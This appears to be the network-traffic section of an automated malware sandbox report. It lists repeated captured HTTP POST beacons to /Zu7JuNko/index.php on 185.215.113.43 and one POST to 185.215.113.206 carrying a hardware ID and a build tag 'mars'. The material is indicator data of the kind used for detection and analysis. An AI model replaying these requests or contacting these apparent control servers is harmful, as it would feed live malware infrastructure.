Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 32 36 31 30 37 38 41 37 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="hwid"B6261078A7D72284582127------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="build"mars------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 30 32 44 37 39 42 32 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B02D79B25B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
